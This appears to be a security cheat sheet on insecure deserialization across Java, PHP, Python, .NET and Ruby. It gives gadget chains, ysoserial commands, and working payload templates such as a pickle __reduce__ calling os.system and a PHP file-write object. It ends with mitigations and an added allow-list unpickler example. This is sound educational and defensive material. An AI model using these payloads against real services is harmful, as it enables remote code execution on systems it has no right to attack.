@aravindkumarsvg
Created February 2, 2026 02:39
Insecure Deserialization

Insecure Deserialization & Gadget Chains — Cheat Sheet

Core Concept

Insecure deserialization occurs when untrusted data is deserialized into objects, allowing attackers to abuse object lifecycle methods and existing code paths (gadgets) to trigger unintended behavior such as RCE.

Attackers inject object graphs, not code.


Key Terms

  • Serialization: Object → bytes/string
  • Deserialization: Bytes/string → object
  • Gadget: Existing class/method with a useful side effect
  • Gadget Chain: Sequence of gadgets automatically triggered
  • Sink: Dangerous operation (exec, eval, file write)

Why It’s Dangerous

Deserialization can implicitly invoke:

  • Constructors
  • Magic methods
  • Lifecycle callbacks
  • Reflection-based invocation

Language-wise Breakdown with Examples


Java

Dangerous API

ObjectInputStream ois = new ObjectInputStream(input);
ois.readObject();

Execution Hooks

  • readObject()
  • readResolve()
  • finalize()

Example Gadget Chain (CommonsCollections)

readObject()
 → HashMap.readObject()
   → Transformer.transform()
     → Runtime.getRuntime().exec("id")

Tool

ysoserial CommonsCollections1 "id"

Impact

💥 Remote Code Execution


PHP

Dangerous API

unserialize($_COOKIE['session']);

Execution Hooks

  • __wakeup
  • __destruct
  • __toString

Example

// Gadget class that already exists in the application: its destructor runs
// automatically when the unserialized object is garbage-collected, so an
// attacker-controlled $file becomes an arbitrary file write.
class Logger {
  public $file;
  function __destruct() {
    file_put_contents($this->file, "pwned");
  }
}

Serialized Payload

O:6:"Logger":1:{s:4:"file";s:10:"/tmp/pwned";}

Impact

📂 Arbitrary file write / RCE


Python

Dangerous API

pickle.loads(user_input)

Execution Hook

  • __reduce__

Example

import os, pickle

class Evil:
    # __reduce__ tells pickle how to rebuild the object: "call os.system with ('id',)".
    # The call happens inside pickle.loads() on the receiving side, not at dumps() time.
    def __reduce__(self):
        return (os.system, ("id",))

payload = pickle.dumps(Evil())  # serialized reference to os.system plus its argument

Impact

💥 Remote Code Execution


C# / .NET

Dangerous APIs

  • BinaryFormatter
  • LosFormatter
  • NetDataContractSerializer

Example Vulnerable Code

BinaryFormatter bf = new BinaryFormatter();
bf.Deserialize(stream);

Execution Hooks

  • ISerializable
  • IDeserializationCallback
  • [OnDeserialized]

Example Gadget Chain

Deserialize()
 → ObjectDataProvider.OnDeserialized()
   → Process.Start("calc.exe")

Tool

ysoserial.net -f BinaryFormatter -g ObjectDataProvider -c calc.exe

Special Case: ASP.NET ViewState

__VIEWSTATE → LosFormatter → Gadget Chain → RCE

Ruby

Dangerous API

Marshal.load(user_input)

Execution Hooks

  • _load
  • marshal_load
  • initialize

Example

class Evil
  # _dump makes Marshal write a TYPE_USERDEF record naming this class;
  # the body returned here is irrelevant, the class name is what matters.
  def _dump(level)
    ""
  end

  # Marshal.load calls _load on the named class before any application
  # code ever sees the object.
  def self._load(data)
    system("id")
  end
end

payload = Marshal.dump(Evil.new)

Rails Session Risk

Cookie → Marshal.load → Gadget Chain → RCE

High-Risk Indicators (VAPT)

Serialized Signatures

  • Java: AC ED 00 05
  • PHP: O: (object) or a: (array) prefix
  • Python: Pickle binary blobs
  • .NET: AAEAAAD
  • Ruby: \x04\x08

Common Attack Vectors

  • Cookies
  • ViewState
  • Hidden form fields
  • API parameters
  • Headers

Mitigation Checklist

❌ Never deserialize untrusted data using native serializers
✅ Use JSON with strict schemas
✅ Implement class allow-lists
✅ Sign and encrypt session data
✅ Remove dangerous libraries
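The "class allow-lists" item above, worked through for Python's pickle as an added example that is not part of the gist: a restricted Unpickler resolves only (module, name) pairs on an allow-list, so the cheat sheet's os.system gadget is refused before it can run. SafeRecord and the allow-list contents are assumptions for the demo.

```python
import io
import os
import pickle

# Gadget of the same shape as the cheat sheet's Evil class: rebuilding the
# object would call os.system("id"). dumps() only records the reference.
class Evil:
    def __reduce__(self):
        return (os.system, ("id",))

# The only application type we expect in a serialized session (assumed).
class SafeRecord:
    def __init__(self, user, role):
        self.user = user
        self.role = role

# Allow-list keyed on exactly what Unpickler.find_class receives.
SAFE_BUILTINS = {"dict", "list", "set", "frozenset", "tuple",
                 "str", "int", "float", "bool", "bytes"}
ALLOWED = {("builtins", n) for n in SAFE_BUILTINS} | {
    (SafeRecord.__module__, "SafeRecord")}

class RestrictedUnpickler(pickle.Unpickler):
    """Every global in the stream goes through find_class; deny by default."""
    def find_class(self, module, name):
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")

def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()

def demo():
    """Returns (safe_record_roundtrips, gadget_blocked)."""
    rec = restricted_loads(pickle.dumps(SafeRecord("alice", "admin")))
    safe_ok = (rec.user, rec.role) == ("alice", "admin")
    payload = pickle.dumps(Evil())  # constructed malicious stream; nothing runs here
    try:
        restricted_loads(payload)
        blocked = False  # would mean os.system was resolved: never expected
    except pickle.UnpicklingError:
        blocked = True   # refused at the os/posix.system lookup, before any call
    return safe_ok, blocked

if __name__ == "__main__":
    print(demo())  # (True, True)
```

The same pattern applies to the other runtimes in this sheet: Java's ObjectInputFilter and PHP's allowed_classes option for unserialize() are the equivalent hooks.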


One-Line Takeaway

Insecure deserialization abuses object lifecycles and existing code paths (gadgets) to reach dangerous sinks without injecting code.


References

  • OWASP Top 10
  • CWE-502
  • ysoserial / ysoserial.net